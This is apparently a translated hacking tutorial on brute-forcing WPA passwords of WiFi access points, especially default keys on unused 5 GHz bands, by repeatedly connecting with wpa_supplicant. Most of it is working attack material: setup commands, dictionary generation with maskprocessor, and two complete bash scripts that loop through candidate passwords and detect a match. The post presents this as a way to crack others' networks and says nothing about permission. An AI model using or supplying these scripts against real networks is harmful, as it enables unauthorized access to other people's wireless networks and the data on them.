BruteForce Keys for Unconfigured 5 GHz Networks
When analyzing large amounts of disclosed keys for wireless access points (including with the program Router Scan by Stas’M ), one interesting observation was made: many owners of dual-band APs do not realize the existence of a second 5 GHz band. Depending on the router model, the second 5 GHz band may be enabled or disabled by default. If it is enabled by default, the 5 GHz band has its own default password. These passwords are built on the same principle, which depends on the model of the router. For example, for all routers of the same model, there can be eight capital letters.
Is it possible to brute WiFi connection?
Yes, you can not grab handshakes, but simply pick up passwords to a wireless access point. Moreover, it is much easier to do this – no special programs are even needed. But no one ever uses it, because the speed is extremely low. The maximum speed, when testing with a single network card, reaches 15 × 60 × 24 = 21600 candidate passwords per day. In this case, when a handshake is hacked, the speed on the average mobile graphics card reaches 40,000 candidate passwords per second (!). With such a speed, 40000×60×60×24 = 2160021600 (these are two billion with a tail) of password candidates can be iterated over a day. How many orders these figures differ I already feel lazy.
Well and nevertheless, the backup option will never be superfluous. The advantage of selecting a password directly, without grabbing a handshake, is that hacking of a WiFi access point is possible even if clients never connect to it.
Brutess can not only dual-band AP with 5 GHz. Brutess can be any access point. But if the AP has a 5 GHz band with the default network name, it is almost certainly the factory password there. These passwords may be different on each router, but the algorithm for generating them for one model is always the same. This is a separate task – to find out the model of the router and collect password samples for it to generate a dictionary with candidates for passwords. For each model of the router it must be solved individually, so we will not dwell on this. Let’s go directly to the mechanism of brute-forcing.
Connecting to a WiFi network from the command line
The brute-force WiFi connection algorithm without capturing handshakes is extremely simple:
- trying to connect with the candidate password
- check if the connection happened
- if there is no connection, then go to the first item with a new candidate for passwords
The most important thing is to be able to connect to WiFi from the command line. Let’s look at how this is done. We need the wpa_supplicant package .
In Kali Linux (as well as Debian, Mint, Ubuntu), it is put like this:
sudo apt-get install wpasupplicant
And in BlackArch like this:
sudo pacman -S wpa_supplicant --needed
We will fail if we do not stop (unload/disable) the NetworkManager service. In Kali Linux, this is done like this:
sudo service NetworkManager stop
And in BlackArch like this:
sudo systemctl stop NetworkManager
Note, after disabling NetworkManager, the Internet will disappear!
We need to create a configuration file. This is done by the command:
wpa_passphrase AP_name password> configuration_file
For example, for the AP Kali password qivxy17988 and the configuration file I want to call wpa_Kitty.conf, then the command has the following form:
wpa_passphrase Kali qivxy17988 > wpa_Kali.conf
A file should be created with something like this:
network={
ssid="Kali"
#psk="qivxy17988"
psk=20a25ed3eb88a5d6fcf7ed713db9255fa109478875a565343d60446824901237
}
Now we need to know the name of the wireless network interface. This is done by the command:
iw dev
In my case, this is wlan0:
You may have another. Therefore, in all subsequent commands, replace wlan0 with the name of your wireless network interface. Connecting to WiFi from the command line is done like this:
sudo wpa_supplicant -B -i wlan0 -c wpa_Kali.conf
Here -B means translate the process into the background. After the -i wlan0 switch , the name of the wireless interface is indicated. And after the -c wpa_Kali.conf switch , the configuration file is specified.
If something goes wrong, then run the same command without the -B switch to view its detailed output. To get connected , you need to run this command:
sudo dhclient wlan0
But even before it you can check if there is a “connection” with the command:
iw dev wlan0 link
If the connection is made, the output will be as in the screenshot above,
If there is no connection, the output will be much more concise: Not connected.
Brute Force WiFi without handshaking
We turn, in fact, to brute force.
Let’s try to connect with the obviously wrong password:
sudo wpa_supplicant -i wlan0 -c wpa_Kali.conf
[[email protected] ~]$ sudo wpa_supplicant -i wlan0 -c wpa_Kali.conf
Successfully initialized wpa_supplicant
wlan0: SME: Trying to authenticate with 40:3d:ec:14:c8:68 (SSID='Kali' freq=2412 MHz)
wlan0: Trying to associate with 40:3d:ec:14:c8:68 (SSID='Kali' freq=2412 MHz)
wlan0: Associated with 40:3d:ec:14:c8:68
wlan0: CTRL-EVENT-DISCONNECTED bssid=40:3d:ec:14:c8:68 reason=15
wlan0: WPA: 4-Way Handshake failed - pre-shared key may be incorrect
wlan0: CTRL-EVENT-SSID-TEMP-DISABLED id=0 ssid="Kali" auth_failures=1 duration=10 reason=WRONG_KEY
Well, if the password is incorrect, then the string WRONG_KEY is present in the output . Filter the output:
sudo wpa_supplicant -i wlan0 -c wpa_kali.conf | grep 'WRONG_KEY'
Let’s create a test dictionary:
maskprocessor pass?d?d?d?d > dict.txt
And somewhere in it we insert the correct password.
Now we will type the script to automate the process (save it to the file brut_wpa.sh):
#!/bin/bash
FILE='dict.txt';
AP='Kali';
Interface='wlan0';
while read -r line
echo 'We test the password: '$line
do
wpa_passphrase $AP $line > wpa_$AP.conf
t=`timeout 4 sudo wpa_supplicant -i $Interface -c wpa_$AP.conf | grep 'WRONG_KEY'`
if [ -z "$t" ]
then
echo 'Password matched.: '$line
exit
fi
done <$FILE
Run like this:
sudo sh brut_wpa.sh
Let’s look at the script in more detail. Here in rows
FILE='dict.txt';
AP='Kali';
Interface='wlan0';
The dictionary file, the AP name and the name of the wireless interface are indicated, respectively.
A timeout reset of 4 is used . If this value is reduced, the probability of false positives increases. If you increase, then decreases the search speed.
By the way, you can still analyze the results not by connection errors, but look for successful connections:
sudo wpa_supplicant -i $Interface -c wpa_$AP.conf | grep 'completed'`
Then the script takes the form:
#!/bin/bash
FILE='dict.txt';
AP='Kali';
Interface='wlan0';
while read -r line
echo 'trying password: '$line
do
wpa_passphrase $AP $line > wpa_$AP.conf
t=`timeout 4 sudo wpa_supplicant -i $Interface -c wpa_$AP.conf | grep 'completed'`
if [ "$t" ]
then
echo 'password found: '$line
exit
fi
done <$FILE
The script will start trying passwords,
The speed is the same, but due to problems with the AP, you can skip the valid password. With the first script, a valid password cannot be skipped – but a false positive to an invalid password is possible. It is recommended to test the timeout value – it is quite possible that for a AP that you are brutally forcibly, the optimal value will not be 4 seconds, but some other number.
Conclusion
The alternative described here, despite its negative characteristics (low speed and the need to always be close to the AP being cracked), has a unique advantage – hacking is possible without the presence of clients from AP, And under certain circumstances, when it is possible to significantly narrow the number of candidates for passwords, it can lead to success. Separately, it is necessary to test whether it is possible to increase the speed of hacking when several wireless network interfaces are activated.
Another interesting advantage compared to the “traditional” methods of hacking is that a special WiFi card is not required. We do not need a monitor mode and the ability to inject. From our WiFi card, only one thing is required – the ability to connect to wireless access points, and absolutely any of them can do it.
Leave a Reply